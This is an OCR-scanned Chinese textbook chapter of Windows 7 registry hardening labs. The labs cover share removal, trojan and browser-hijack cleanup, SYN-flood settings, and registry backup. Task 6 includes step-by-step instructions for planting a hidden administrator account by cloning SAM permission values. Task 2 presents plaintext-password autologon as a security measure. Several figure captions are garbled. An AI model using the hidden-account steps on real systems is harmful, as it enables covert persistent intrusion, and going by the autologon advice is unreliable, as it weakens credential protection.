全 sutodiscomnect REG_DWORD Ox0000000f (15) 

AutoShareServer REG_DWORD 。 0x00000000 (0) 

FES REG mo oxo0000000 O) 

全 EnsbleAuthen .， REG_JWORD ”0x00000000 (10) 国 
»| 
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图 10-2 修改 AutoShareWks 键 值 项 


如 果 找 不 到 AutoShareWks 键 值 项 则 在 右 侧 窗 格 中 右 击 ,在 弹出 的 快捷 菜单 中 选择 
“新 建 ” 一 “DWORD(32- 位 ) 值 ”命令 ,然后 将 新 建 项 重新 命名 为 AutoShareWks, 设 置 其 类 
型 为 REG_DWORD, 值 为 0。 

注意 : (1) 和 (2) 的 操作 均 在 services \lanmanserver 下 修改 ,如 果 在 services\ 
lanmanworkstation 下 修改 则 不 会 成 功 。 修 改 完 注册 表 , 使 用 net share 命令 删除 分 区 默 
认 共 享 和 管理 默认 共享 后 ,重新 启动 计算 机 ,发 现 这 些 默认 共享 不 会 再 出 现 了 。 

(3) 关闭 IPC$ 默认 共享 ,防范 IPC$ 攻击。 通过 修改 注册 表达 到 防范 IPC$ 攻击 的 
目的 ,具体 操作 步骤 如 下 。 

打开 注册 表 编 辑 器 , 展开 HKEY _ LOCAL _ MACHINE \ SYSTEM \ 
CurrentControlSet\Control\Lsa 子 键 。 

@ 在 该 子 键 右边 窗 格 中 找到 并 双击 restrictanonymous 键 值 项 ,如 图 10-3 所 示 。 将 
“数值 数据 "文本 框 里 的 数值 修改 为 1, 单 击 “ 确 定 ” 按 钮 保存 ,如 图 10-4 所 示 。 这 样 即 可 将 
IPC$ 共享 关闭 。 

注意 : 如 果 修 改 完 注册 表 , 使 用 net share 命令 删除 IPC$ 共 享 ,并 重新 启动 后 ,发 现 
IPC$ 共享 还 在 , 则 可 以 在 “运行 ”对话 框 中 执行 secpol. msc 命令 ,然后 在 “本 地 安全 策略 ” 
窗口 的 左 侧 窗 格 中 单 击 “ 安 全 设置 ">“ 本 地 策略 ”>“ 用 户 权 限 分 配 ” 项 ,在 右 侧 窗 格 中 双 
击 “ 拒 绝 从 网 络 访问 这 台 计 算 机 ”, 在 弹出 的 对 话 框 中 单 击 “ 添 加 用 户 或 组 ”按钮 ,输入 
administrator; guest, 然 后 单 击 “ 确 定 ” 按 钮 。 远 程 计 算 机 使 用 net use 命令 则 会 出 现 “ 系 
统 错 误 1385: 登录 失败 ”的 提示 信息 。 
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图 10-4 ”修改 restrictanonymous 键 值 


人 42 任务 2: 设置 Wndows 的 自动 登录 


1. 任务 目标 


如 果 计 算 机 被 黑客 监控 了 ,在 登录 Windows 时 账号 .密码 有 可 能 外 泄 , 因 此 可 通过 设 
置 注册 表 人 允许 用 户 绕 过 Windows 系统 的 登录 对 话 框 ,自动 登录 到 计算 机 和 网 络 中 。 


2. 工作 任务 

设置 Windows 的 自动 登录 。 

3. 工作 环境 

一 台 预 装 Windows 7 系统 的 主机 。 
4. 实施 过 程 


通过 修改 注册 表达 到 自动 登录 到 计算 机 的 目的 ,具体 操作 步骤 如 下 。 

(1) 打开 注册 表 编 辑 器 ,展开 HKEY_LOCAL_MACHINE\SOFTWARE \ Microsoft\ 
WindowsNT\CurrentVersion\Winlogon 子 键 , 如 图 10-5 所 示 。 

(2) 在 Winlogon 子 键 中 创建 3 个 字符 串 值 ,并 将 其 分 别 命名 为 Default 


ED ET TE 


Yindows 


9 tohdninL oeon ) 
于 hutoLogonChecked | hutoRestartShell 


图 10-5 展开 Winlogon 子 键 





DomainName、 DefaultUserName DefaultPassword, 如 图 10-6 所 示 。 
注册 表 编 辑 吕 


Windows 


日 日 ,rg De TT 
| MtoLogonChecked i ab]DefanltUserNane 


图 10-6 创建 新 键 值 项 


(3) 这 3 个 键 值 项 分 别 为 用 户 所 在 的 域名 、 登 录用 户 名 和 密码 。 依 次 编辑 键 值 , 单 击 
“确定 ”按钮 保存 ,如 图 10-7 所 示 。 

(4) 新 建 一 个 名 为 AutoAdminLogon 的 字符 串 值 ,将 其 键 值 设置 为 1, 即 激活 自动 登 
录 , 单 击 “ 确 定 ” 按 钮 保存 ,如 图 10-8 所 示 。 


编辑 字符 串 eae 











图 10-7 设置 登录 用 户 名 图 10-8 ”设置 键 值 


1043 任务 3: 清除 系统 中 随机 启动 的 木马 


1. 任务 目标 


木马 通常 将 自身 隐藏 在 系统 中 某 个 不 起 眼 “ 角 落 " 里 ,并 且 可 能 将 自己 伪装 成 “面貌 普 
通 ” 的 文件 ,一 旦 用 户 不 小 心 运行 了 该 木马 的 服务 端 ,该 木马 的 服务 端 在 用 户 的 计算 机 上 
立即 开始 工作 ,通过 端口 与 客户 端 进行 连接 ,黑客 就 可 以 通过 某 个 端口 连接 到 该 计算 机 上 
进行 攻击 。 通 过 注册 表 的 设置 可 以 清除 系统 中 随机 启动 的 木马 。 


2. 工作 任务 

清除 系统 中 随机 启动 的 木马 。 

3. 工作 环境 

一 台 预 装 Windows 7 系统 的 主机 。 








| Co) (第 版 ] 


在 注册 表 中 自动 启动 的 木马 往往 隐藏 在 HKEY_LOCAL_MACHINE\SOFTWARE \ 
Microsoft\ Windows \ CurrentVersion \ Run, HKEY _ LOCAL _ USER \ SOFTWARE\ 
Microsoft \ Windows \ CurrentVersion \ Run, HEKY _ USERS\ DEFAULT\ Software\ 
Microsoft\ Windows \ CurrentVersion\Run 等 子 键 中 。 删 除 这 些 木马 的 具体 操作 步 又 
如 下 。 

(1) 打开 注册 表 编 辑 器 ,展开 HKEY_LOCAL_MACHINE\SOFTWARE \ Microsoft \ 
Windows\CurrentVersion\Run 子 键 ,如 图 10-9 所 示 。 





( 政 值 未 设 置 ) 
CC: \PROGRA™1 \COWWON "1 \WICEDS™“1 \IWEL 4\SHAEED\ TMEKLNG. EXE /SetPreload /CHS /Log 


Ci\Frogr mm Files\Virare\Veare Tools\Virerelray exe 
C:\Program Files\Virare\Vvare Tools\Vvarelser exe” 
i 加 
隔 短 机 VEY LOCAL_NACHINE\SOPTYARE\Wi er osoft Windons\Currentyersion\Run | 





图 10-9 展开 Run 子 键 


(2) 在 右边 窗 格 中 查找 一 下 ,看 是 否 有 可 疑 的 自动 启动 文件 ,通常 扩展 名 为 . exe。 

(3) 按 Ctrl+F 快捷 键 弹出 “查找 ?对 话 框 ,在 “查找 目标 ”文本 框 中 输入 在 第 (2) 步 发 现 
的 可 疑 可 执行 文件 , 单 击 “ 查 找 下 一 个 ”按钮 ,将 找到 所 有 和 这 个 键 值 一 样 的 程序 ,将 其 删除 。 

(4) 退出 注册 表 , 重 启 计算 机 。 

注意 : 有 些 木 马 程序 产生 的 文件 很 像 系统 自 带 的 文件 ,有 时 只 有 一 个 字母 的 差别 。 


1n44 任务 4: 清除 恶意 代码 
1. 任务 目标 


由 于 Windows 系统 启动 的 同时 就 开始 了 与 注册 表 的 数据 信息 进行 相互 交换 ,并 且 在 
计算 机 使 用 的 过 程 中 ,系统 不 断 与 注册 表 中 保存 的 数据 信息 进行 相互 交换 。 因 此 当 用 户 
在 浏览 互联 网 或 下 载 软件 .资料 时 都 面临 着 由 于 系统 漏洞 导致 系统 遭受 各 种 恶意 攻击 的 
风险 ,一 旦 感染 了 恶意 代码 就 可 能 导致 恶意 网 站 和 对 话 框 自动 弹出 ,甚至 有 时 IE 浏览 器 
的 首页 和 右键 菜单 被 筑 改 的 面目 全 非 。 而 几乎 所 有 的 网 页 恶意 代码 都 是 利用 注册 表 来 实 
现 操作 的 。 


2. 工作 任务 


(1) 删除 开机 自动 弹出 的 网 页 。 

(2) 删除 开机 自动 弹出 的 恶作剧 对 话 框 。 
(3) 修改 下 的 首页 。 

(4) 修改 下 的 默认 页 。 

(5) 修改 下 的 右键 菜单 。 
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(6) 删除 IE 工具 栏 中 被 添加 的 网 站 超 链接 。 
3. 工作 环境 

一 台 预 装 Windows 7 系统 的 主机 。 

4. 实施 过 程 


(1) 删除 开机 自动 弹出 的 网 页 。 最 常见 的 恶意 代码 的 表现 是 开机 即 自动 弹出 网 页 。 
这 是 注册 表 项 被 恶意 添加 网 址 所 致 。 用 户 可 以 打开 注册 表 编 辑 器 展开 下 面 两 个 子 键 ,如 
果 发 现 这 两 个 子 键 下 的 某 个 键 值 项 的 键 值 是 弹出 网 页 的 网 址 就 将 键 值 删除 ,重启 计算 机 
即 可 。 

这 两 个 子 键 是 HKEY_CURRENT _USER\SOFTWARE\Microsoft\ Windows\ 
CurrentVersion\Run 和 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\ 
CurrentVersion\RunOnce, 

在 右 侧 窗 格 中 将 后 级 为 . url、. html、. htm、. asp、. aspx 或 者 . php 等 网 址 属性 的 键 值 
全 部 删除 即 可 。 这 种 恶意 代码 往往 会 对 注册 表 的 不 同 键 值 进行 多 处 修改 ,删除 一 处 可 能 
还 不 能 完全 将 其 清除 ,因此 用 户 可 以 使 用 注册 表 编 辑 器 的 查找 功能 来 搜索 目标 ,并 将 其 
删除 。 

(2) 删除 开机 自动 弹出 的 恶作剧 对 话 框 。 某 些 恶意 代码 会 修改 注册 表 的 某 些 键 值 
项 ,让 用 户 在 开机 的 时 候 弹 出 一 些 莫名 其 妙 的 对 话 框 ,这 个 子 键 是 HKEY_LOCAL_ 
MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Winlogon,。 

这 种 对 话 框 看 起 来 很 有 危险 性 ,其实 只 是 一 个 恶作剧 。 如 果 不 喜 欢 别 人 使 用 自己 的 
计算 机, 可 以 利用 这 个 策略 来 警示 一 下 那些 不 受 欢 迎 的 “客人 ”。 其 中 
LegalNoticeCaption 是 提示 框 的 标题 ,LegalNoticeText 是 提示 框 的 文本 内 容 , 具 体操 作 
步骤 如 下 。 

Q@ 打开 注册 表 编 辑 器 ,展开 HKEY_LOCAL_MACHINE\SOFTWARE \ Microsoft\ 
WindowsNT\CurrentVersion\Winlogon 子 键 , 如 图 10-10 所 示 。 


主 册 表 编辑 只 _=|olx| 
文件 F) 编辑 FE) 查看 W) 收藏 只 人) 帮助 00 





VinSATAFI 二 中 zjLegalNotieeText REG_SZ 
Em mm 到 | 到 Passvorazzpiryrarning REG mrom 辆 


MSIE 
图 10-10 展开 Winlogon 子 键 
@ 在 Winlogon 的 右 侧 窗 格 中 找到 两 个 键 值 项 : LegalNoticeCaption 和 LegalNoticeText ， 
分 别 双击 它们 打开 ,同时 输入 一 些 警示 性 文字 , 单 击 “确定 ”按钮 保存 ,如 图 10-11 和 图 10-12 
所 示 。 
@ 关闭 注册 表 编 辑 器 ,重启 计算 机 ,在 出 现 登 录 对 话 框 之 前 就 会 弹出 一 个 警示 框 , 单 








图 10-11 LegalNoticeCaption 设置 (警示 框 标题 ) 





图 10-12 ”LegalNoticeText 设置 (警示 性 文字 ) 


击 “ 确 定 ” 按 钮 即 可 进入 系统 。 如 果 要 取消 该 设置 ,把 键 值 删 除 即 可 。 

(3) 修改 IE 的 首页 。 有些 IE 被 算 改 首页 ,是 因为 注册 表 的 键 值 被 恶意 修改 造成 的 。 
恢复 IE 默认 首页 的 具体 操作 步骤 如 下 。 

Q@ 打开 注册 表 编 辑 器 ,展开 HKEY_LOCAL_MACHINE\Software\ Microsoft \ 
Internet Explorer\Main 子 键 。 在 右 侧 窗 格 中 双击 Start Page 选项 ,打开 “编辑 字符 串 ” 对 
话 框 ,将 “数值 数据 ”文本 框 中 的 内 容 设置 为 about:blank 或 想 要 的 首页 地 址 ,然后 单 击 
“确认 ”按钮 ,如 图 10-13 所 示 。 


主 册 表 编辑 器 
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图 10-13 ”IE 首页 设置 


@ 打开 注册 表 编 辑 器 ,展开 HKEY_CURRENT_USER \Software\ Microsoft\ 
Internet Explorer\Main 子 键 。 在 右 侧 窗 格 中 双击 Start Page 选项 ,打开 “编辑 字符 串 ” 对 
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话 框 ,将 Start Page 的 键 值 改 为 about: blank 或 想 要 的 首页 地 址 ,然后 单 击 “ 确 认 ” 按 钮 ， 
如 图 10-14 所 示 。 

注意 : 如 果 用 户 修改 完毕 重启 后 发 现 又 被 改 了 回去 ,此 时 就 不 得 不 重新 进入 注册 表 , 先 
重复 上 述 操 作 , 然 后 展开 HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ 
CurrentVersion\Run 子 键 , 仔 细 寻 找 有 没有 可 疑 的 键 值 ,如 果 有 则 删除 ,重启 生效 。 
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图 10-14 “HKEY_CURRENT_USER” 首 页 设置 


(4) 修改 IE 的 默认 页 。 有 些 IE 被 算 改 默认 页 后 ,设置 “使 用 默认 页 ”仍然 无 效 , 这 是 
因为 IE 的 默认 页 也 被 自 改 ,被 更 改 的 注册 表 项 目 为 HKEY_LOCAL_MACHINE\ 
Software\Microsoft \Internet Explorer\Main 子 键 下 的 Default_page_URL 和 Default_ 
page_URL 键 值 , 它 们 是 起 始 页 的 默认 页 。 恢 复 IE 默认 页 的 具体 操作 步骤 如 下 。 

@ 打开 注册 表 编 辑 器 ,展开 HKEY_LOCAL_MACHINE\ Software\ Microsoft\ 
Internet Explorer\Main 子 键 。 

@ 在 右 侧 窗 格 中 双击 Default_page_URL 选项 ,在 弹出 的 “编辑 字符 串 ” 对 话 框 中 将 
“数值 数据 ”文本 框 中 的 内 容 设 置 为 想 要 的 默认 页 ,然后 单 击 “ 确 认 ” 按 钮 。 

(5) 修改 IE 的 右键 菜单 。IE 右键 菜单 的 改变 是 下 列 注册 表 项 被 恶意 修改 造成 的 。 

Q@ 打开 注册 表 编辑 器 ,展开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ 
Internet Explorer\MenExt 子 键 。 

@ 选中 含有 恶意 代码 的 IE 右键 菜单 项 ,然后 右 击 , 从 弹出 的 快捷 菜单 中 选择 “删除 ” 
命令 。 

(6) 删除 IE 工具 栏 中 被 添加 的 网 站 超 链接 。 常 用 的 软件 如 Flashget、QQ 等 在 安装 
后 ,会 向 IE 工具 栏 中 添加 它们 的 快捷 方式 ,现在 有 些 网 站 也 通过 恶意 代码 修改 注册 表 来 
达到 同样 的 目的 。 要 防止 IE 工具 栏 中 被 添加 网 站 超 链接 ,只 需要 将 包含 恶意 网 站 超 链接 
的 子 键 删除 即 可 ,具体 操作 步骤 如 下 。 

@ 打开 注册 表 编 辑 器 .展开 HKEY_LOCAL_MACHINE\Software\ Microsoft\ 








| Ce EEE 


Internt Explorer\Extensions 子 键 。 

@ 如 果 看 到 有 一 些 形 如 “{X XXXxX-xXxXX-xxX-xxXxXxXxxX})” 的 子 键 ,删除 
这 些 包含 恶意 网 站 超 链 接 的 子 键 就 可 以 清除 IE 工具 栏 中 被 添加 的 网 站 超 链 接 。 

@ 如 果 看 到 如 图 10-15 所 示 右 侧 窗 格 “ 数 值 未 设置 "的 显示 , 则 表明 IE 工具 栏 菜单 
没有 被 恶意 网 站 或 其 他 软件 添加 快捷 方式 。 
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图 10-15 清除 IE 工具 栏 中 被 添加 的 网 站 超 链接 
145 任务 5: 防止 SN 洪水 攻击 


1. 任务 目标 


SYN 攻击 属于 DoS 攻击 的 一 种 , 它 利 用 TCP 协议 缺陷 .通过 发 送 大量 半 连接 请 求 消 
耗 CPU 和 内 存 资源 。SYN 攻击 除了 影响 主机 外 ,还 危害 路 由 器 .防火墙 等 网 络 系统 。 

SYN 攻击 的 工作 原理 是 : 当 服 务 器 接收 到 连接 请 求 时 ,服务 器 将 此 请 求 信息 加 入 未 
连接 队列 中 ,并 发 生 请 求 包 给 客户 端 ; 当 服 务 器 未 收 到 客户 端的 确认 包 时 ,将 会 重 发 请 求 
包 , 直 到 超时 才 将 该 信息 从 未 连接 队列 中 删除 。 配 合 IP 欺骗 SYN 的 攻击 效果 很 好 。 客 
户 端 利 用 伪装 大 量 不 存在 的 IP 地 址 向 服务 器 不 断 发 送 SYN 包 , 服 务 器 回复 确认 包 后 ,等 
待 客户 的 确认 ,因为 源 地 址 是 不 存在 的 ,因此 服务 器 需要 不 断 重 发 直至 超时 ,伪装 的 SYN 
包 长 时 间 占 用 未 连接 队列 致使 正常 的 SYN 包 被 丢弃 ,目标 系统 运行 缓慢 ,其 至 处 于 瘫痪 

SYN 攻击 不 管 目标 主机 是 什么 系统 ,只 要 这 些 系 统 打 开 了 TCP 服务 就 可 以 实施 。 
为 了 防范 SYN 攻击 , Windows 2000 以 上 的 版 本 都 在 TCP/IP 协议 内 内 了 
SynAttackProtect 机 制 ,通过 关闭 某 些 Socket 选项 ,增加 额外 的 连接 指示 并 减少 超时 时 
间 , 使 系统 能 处 理 更 多 SYN 连接 ,以 达到 防范 SYN 的 目的 。 但 在 默认 情况 下 Windows 
并 不 支持 SynAttackProtect 保护 机 制 ,需要 在 注册 表 中 做 出 相应 修改 才 行 。 


2. 工作 任务 
防止 SYN 洪水 攻击 。 
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3. 工作 环境 
一 台 预 装 Windows 7 系统 的 主机 。 
4. 实施 过 程 


具体 操作 步骤 如 下 。 
(1) 打开 注册 表 编 辑 器 , 展开 HKEY _ LOCAL _ MACHINE \ SYSTEM \ 
CurrentControl Set\Services\Tcpip\Parameters 子 键 ,如 图 10-16 所 示 。 
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图 10-16 展开 Parameters 子 键 


(2) 在 右 侧 窗 格 空白 处 右 击 ,从 弹出 的 快捷 菜单 中 选择 “新 建 DWORD 值 ”命令 ,将 
新 创建 的 DWORD 值 命名 为 SynAttackProtect, 如 图 10-17 所 示 。 


主 册 表 编辑 示 


REG_SZ 
REG_DYORD Ox00000001 (1) 
BEG_DWORD Ox00000001 (1)a 
BEG_DWORD Ox00000002 (2) 





图 10-17 新 建 键 值 项 


(3) 双击 新 创建 的 SynAttackProtect 键 值 项 ,将 “数值 数据 "文本 框 内 的 数字 修改 为 
2, 单 击 “ 确 定 ” 按 钮 保存 ,如 图 10-18 所 示 。 


编辑 proRD (32 位 ) 什 





图 10-18 设置 键 值 


(4) 使 用 同样 的 方法 创建 6 个 DWORD 键 值 项 .分别 是 : EnablePMTUDiscovery, 键 值 为 
0; NoNameReleaseOnDemand, 键 值 为 1; EnableDeadGWDetect, 键 值 为 0; KeepAliveTime, 键 值 
为 300000; PerformRouterDiscovery, 键 值 为 0; EnableCMPRedirect, 键 值 为 0。 
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人 {46 任务 6: 注册 表 的 防 黑 设置 
1. 任务 目标 


注册 表 对 于 系统 的 重要 性 是 毋庸 置疑 的 ,所 以 注册 表 也 是 黑客 “青睐 ”的 对 象 。 通 过 
对 注册 表 进 行 相关 设置 ,可 以 有 效 防止 黑客 的 入侵 。 


2. 工作 任务 


(1) 禁止 远程 修改 注册 表 。 
(2) 禁止 普通 用 户 查看 事件 记录 。 
(3) 找 出 隐藏 的 超级 用 户 。 


3. 工作 环境 
一 台 预 装 Windows 7 系统 的 主机 。 
4. 实施 过 程 


(1) 禁止 远程 修改 注册 表 。Windows 7 支持 通过 网 络 使 用 注册 表 编 辑 器 对 注册 表 的 
数据 进行 修改 ,默认 的 系统 配置 下 ,用 户 可 以 进行 远程 操作 。 为 了 提高 系统 的 安全 性 , 避 
免 计 算 机 的 注册 表 被 黑客 通过 网 络 修改 ,可 以 禁用 此 功能 ,具体 操作 步骤 如 下 。 

打开 “注册 表 编 辑 器 "窗口 ,在 左 侧 窗 格 中 展开 HKEY_LOCAL_MACHINE\ 
SYSTEM\CurrentControlSet\control\SecurePipeServers\winreg 子 键 。 

@ 在 右 侧 窗 格 中 双击 “默认 ”项 ,在 弹出 的 “编辑 字符 串 ” 对 话 框 中 输入 1, 单 击 “ 确 定 ” 
按钮 ,如 图 10-19 所 示 。 
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图 10-19 ”禁止 远程 修改 注册 表 


@ 关闭 “注册 表 编 辑 器 ”窗口 ,重新 启动 计算 机 。 

(2) 禁止 普通 用 户 查看 事件 记录 。 系 统 事件 记录 日 志 记录 了 计算 机 所 有 的 程序 、 安 
全 和 系统 事件 。 在 这 些 记 录 里 ,可 能 会 包含 一 些 关 于 系统 安全 方面 的 信息 。 默 认 情 况 下 ， 
即使 是 Guest 用 户 也 有 权限 查看 事件 记录 ,这 在 一 定 程度 上 降低 了 系统 的 安全 性 。 如 果 
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黑客 查看 到 这 些 信息 ,就 会 更 加 容易 人 侵 系统 。 可 以 通过 注册 表 禁 止 普 通用 户 查看 事件 
记录 ,而 只 允许 拥有 系统 管理 员 权限 的 用 户 查 看 这 些 记录 ,具体 操作 步骤 如 下 。 

Q@ 打开 * 注 册 表 编辑 器 ”窗口 ,在 左 侧 窗 格 中 展开 HKEY_LOCAL_MACHINE\ 
SYSTEM\CurrentControlSet\Services\Eventlog 子 键 。 

@ 在 eventlog 子 键 下 有 Application .Security 和 System 3 个 子 键 ,分 别 在 每 一 个 子 
键 的 右 侧 窗 格 中 双击 RestrictGuestAccess 键 值 , 将 其 值 均 修改 为 1, 即 可 禁止 普通 用 户 查 
看 事件 日 志 , 如 图 10-20 所 示 。 
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图 10-20 ”禁止 普通 用 户 查看 事件 记录 


注意 : 如 果 Application、Security 和 System 3 个 子 键 下 没有 RestrictGuestAccess 键 
值 , 则 在 3 个子 键 下 分 别 新 建 一 个 DWORD 值 ,命名 为 RestrictGuestAccess, 并 将 其 键 值 
设置 为 1。 

(3) 找 出 隐藏 的 超级 用 户 。 一 般 技术 高 超 的 黑客 ,可 以 通过 修改 注册 表 在 系统 中 创 
建 隐藏 的 超级 用 户 ,并且 在 账户 管理 器 中 看 不 到 该 账号 ,即便 在 命令 行 中 使 用 net user 命 
令 也 查看 不 到 ,唯一 的 方法 是 在 注册 表 中 查看 相应 的 键 值 ,具体 操作 步 又 如 下 。 

@ 打开 注册 表 编 辑 器 窗口 ,在 左 侧 窗 格 中 展开 HKEY_LOCAL_MACHINE\SAM 
子 键 , 右 击 SAM 子 键 , 在 弹出 的 快捷 菜单 中 选择 “权限 ”命令 ,如 图 10-21 所 示 。 

@ 在 打开 的 “SAM 的 权限 ”对 话 框 中 选中 可 访问 子 键 的 账户 名 或 所 在 的 用 户 组 ,并 
把 权限 设置 为 “完全 控制 ”, 单 击 “ 确 定 ” 按 钮 ,如 图 10-22 所 示 。 

@ 这 时 就 可 以 看 到 在 SAM 子 键 下 多 出 几 个 子 键 ,各 个 子 键 就 是 当前 系统 所 有 的 账 
号 列表 ,包括 隐藏 账 户 。 如 果 发 现 该 列表 中 与 系统 账号 管理 器 或 者 使 用 net user 命令 看 
到 的 用 户 不 一 致 ,那么 可 以 断定 是 非法 创建 的 秘密 账号 ,直接 将 其 对 应 的 子 键 删除 即 可 。 
注意 ,注册 表 编 辑 器 必须 使 用 管理 员 身 份 运行 才 行 。 

如 果 Windows 7 64 位 系统 中 没有 隐藏 的 超级 管理 员 账 户 ,那么 用 以 下 方法 创建 超级 
管理 员 账 户 。 
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图 10-21 SAM 子 键 的 右键 快捷 菜单 
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CE ] m8 | 
图 10-22 设置 SAM 的 权限 


OO 按 Win 十 R 快捷 键 打开 “运行 "窗口 ,输入 lusrmgr. msc。 

@ 在 “本 地 用 户 组 ”窗口 中 ,新 建 隐藏 用 户 test$ ,密码 是 1。 也 可 以 用 命令 net user 
test$ 1 /add 创建 。 

@ 在 “运行 "窗口 输入 regedit 打开 注册 表 编 辑 器 ,在 左 侧 窗 格 中 展开 HKEY_ 
LOCAL_MACHINE\SAM 子 键 , 右 击 SAM 选项 ,在 弹出 的 快捷 菜单 中 选择 “权限 ” 
命令 。 

@ 在 打开 的 “SAM 的 权限 ?对 话 框 中 选中 可 访问 子 键 的 账户 名 或 所 在 的 用 户 组 ,并 
把 权限 设置 为 “完全 控制 ”, 单 击 “ 确 定 ” 按 钮 ,如 图 10-22 所 示 。 

@ 这 时 就 可 以 看 到 在 SAM 子 键 下 多 出 子 键 Domains。 在 左 侧 窗 格 中 展开 HKEY_ 
LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names 子 键 。 








@ 单 击 Names 子 键 下 的 Administrator 账户 ,窗口 右 侧 的 类 型 显示 为 0x1F4, 可 知 


Users 子 键 的 000001F4 对 应 Administrator 账户 的 权限 键 值 ,在 窗口 右边 找到 并 双击 下 
键 值 ,复制 里 面 的 数据 ,如 图 10-23 所 示 。 
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数值 名 称 0 - 


BD Atninistrator 
Guest 
tests 
vip 
Builtin 到 
峙 短 机 WEY_LDCAL MACHINE \SAN\SAM\Domains\Account\Users\000001F4 











10-23 复制 Administrator 的 下 键 值 


@ 单 击 Names 子 键 下 的 test$ 账户 ,窗口 右 侧 的 类 型 显示 为 0x3F4, 可 知 Users 子 


键 的 000003F4 对 应 test$ 账户 的 权限 键 值 。 在 窗口 右边 找到 并 双击 下 键 值 ,把 test$ 账 
户 的 下 键 值 替 换 成 刚 复制 的 Administrator 的 下 键 值 ,如 图 10-24 所 示 。 





文件 于 ) 编辑 于 】 查看 WV) 收藏 夫 以 ) 帮助 00 
日- 击 WKEY_LOCAL MACHINE 类 型 3 
由 -上 唱 BCD00000000 ab] (默认 ) REG_SZ (数值 未 设置 ) 
由 - 唱 HARDWARE 训 F REG_BINARY 02 00 01 00 00 00 00 00 d9 Se 2e Tc eb fd d. 
了 这 my 
日 肘 sm 
EM Donains 
日 - 国 hecount 
四 时 Niases 
由 - 晶 Groups 
日 昌 wers 
遇 ooooolr 
晶 o0o001F5 
避 000003F0 
小 OOoo0srd 
日 直 fanes 
用 Atninistrater 
A Guest 
BD tests 
vip 
由 赂 Builtin 到 
峙 算 机 \YEY_LDCAL MACHINE\SAN\SAN\Domains\Account \Users\O00003F, 





















图 10-24 test$ 的 下 键 值 替换 成 Administrator 的 下 键 值 


@@ 分 别 右 击 Names 下 的 test$ 和 Users 下 test$ 对 应 的 000003F4 子 键 ,选择 “导出 ” 


命令 ,导出 分 支 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ Account\ Users\ 


000003F4 和 
Names \test 


@ 在 “月 





HKEY _LOCAL_MACHINE\ SAM\ SAM\ Domains\ Account\ Users\ 
$ 了 于 键 ,分 别 命名 为 1. reg 和 2. reg, 保 存在 桌面 上 。 
目 户 和 组 管理 ?界面 把 test $ 账户 删除 ,或 者 用 命令 net user test$ /del 进行 
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删除 ,然后 双击 导出 在 桌面 上 的 两 个 注册 表 分 支 1. reg 和 2. reg, 导 和 人 注册 表 , 注 册 表 中 隐 
藏 的 账户 test$ 和 test$ 在 Users 下 的 子 键 又 出 现 了 。 

0 在 命令 行 用 net user 命令 查看 不 到 test$ 账号 ,在 “用 户 ” 窗 口 也 查看 不 到 该 账号 ， 
但 系统 随时 可 以 用 隐藏 账号 test 登录 。 


人 {47 任务 7: 注册 表 的 备份 和 恢复 
1. 任务 目标 


用 户 对 注册 表 的 每 一 次 操作 可 以 说 都 是 危险 的 ,虽然 大 多 数 情 况 下 没有 出 现 问题 ,但 
如 果 出 现 问题 ,可 能 就 比较 麻烦 。 所 以 用 户 对 注册 表 进 行 修改 之 前 ,最 好 提前 备份 ,这 样 
在 修改 过 注册 表 后 如 果 出 现 问题 ,还 可 以 通过 恢复 注册 表 的 方法 解决 。 


2. 工作 任务 


(1) 备份 注册 表 。 
(2) 恢复 注册 表 。 


3. 工作 环境 
一 台 预 装 Windows 7 系统 的 主机 。 
4. 实施 过 程 


(1) 备份 注册 表 。 具 体操 作 步骤 如 下 。 
O 打开 注册 表 编辑 器 ,选择 "文件 ”一 "导出" 命令。 
@ 在 弹出 的 * 导 出 注册 表 文 件 "对 话 框 中 ,选择 注册 表 文件 的 存储 位 置 并 输入 一 个 合 
适 的 文件 名 ,然后 在 “导出 范围 "选项 组 中 选择 “全 部 " 单 选 按钮 ,如 图 10-25 所 示 。 
|[& ”导出 注册 表 文 件 四 
mm 6 
国 %。。 才 型 = 


es” 天 雪 :。 





图 10-25 导出 注册 表 
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@ 单 击 “保存 ”按钮 ,注册 表 编 辑 器 开始 将 注册 表 全 部 内 容 导 出 到 指定 的 . reg 文 
件 中 。 

(2) 恢复 注册 表 。 在 恢复 注册 表 时 ,可 以 继续 使 用 注册 表 编 辑 器 将 注册 表 备 份 的 
.reg 文件 导入 ,这 将 用 . reg 文件 中 的 内 容 覆 盖 当 前 的 注册 表 内 容 ,具体 操作 步骤 如 下 。 

Q@ 打开 注册 表 编 辑 器 窗口 ,选择 “文件 ”>“ 导 入 ”命令 ,打开 “导入 注册 表 文 件 ” 对 
话 框 。 

@ 在 “导入 注册 表 文 件 ” 对 话 框 中 选择 要 导入 的 注册 表 备份 文件 。 

@@ 单 击 “打开 ?按钮 ,注册 表 编 辑 器 开始 将 . reg 文件 中 的 内 容 导入 并 覆盖 当前 注册 
表 , 如 图 10-26 所 示 。 导 入 完成 后 重新 启动 计算 机 即 可 。 

注意 : 另外 一 种 方法 是 打开 Windows 资源 管理 器 ,找到 要 导入 的 . reg 文件 ,然后 双 
击 它 或 右 击 该 文件 并 从 弹出 的 快捷 菜单 中 选择 “合并 ”命令 ,这 样 便 可 以 将 注册 表 文 件 











图 10-26 导入 . reg 文件 覆盖 当前 注册 表 


10.5 常见 问题 解答 


1. 恶意 代码 常 利 用 注册 表 的 哪些 子 键 实现 自 启动 ? 

答 : 恶意 代码 常 利用 注册 表 的 以 下 子 键 实现 自 启动 。 
HKEY_CURRENT_USER\SOFTWARE \Microsoft\Windows\CurrentVersion\Run 
HKEY_CURRENT_USER\SOFTWARE \Microsoft\ Windows\CurrentVersionN\RunOnce 
HKEY_CURRENT_USER\SOFTWARE \Microsoft\ Windows\CurrentVersion\RunServices 
HKEY_LOCAL MACHINE\SOFTWARE \Microsoft\ Windows\CurrentVersion\Run 
HKEY_LOCAL MACHINE\SOFTWARE \Microsoft\ Windows\CurrentVersion\RunOnce 
HKEY_LOCAL MACHINE\SOFTWARE \Microsoft\Windows\CurrentVersion\RunServices 
HKEY_LOCAL MACHINE\SOFTWARE \Microsoft\ Windows\CurrentVersion\ Winlogon 
2. 如 何 利用 注册 表 屏 蔽 445 端口 ? 

答 :打开 注册 表 编 辑 器 ,展开 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet\ 
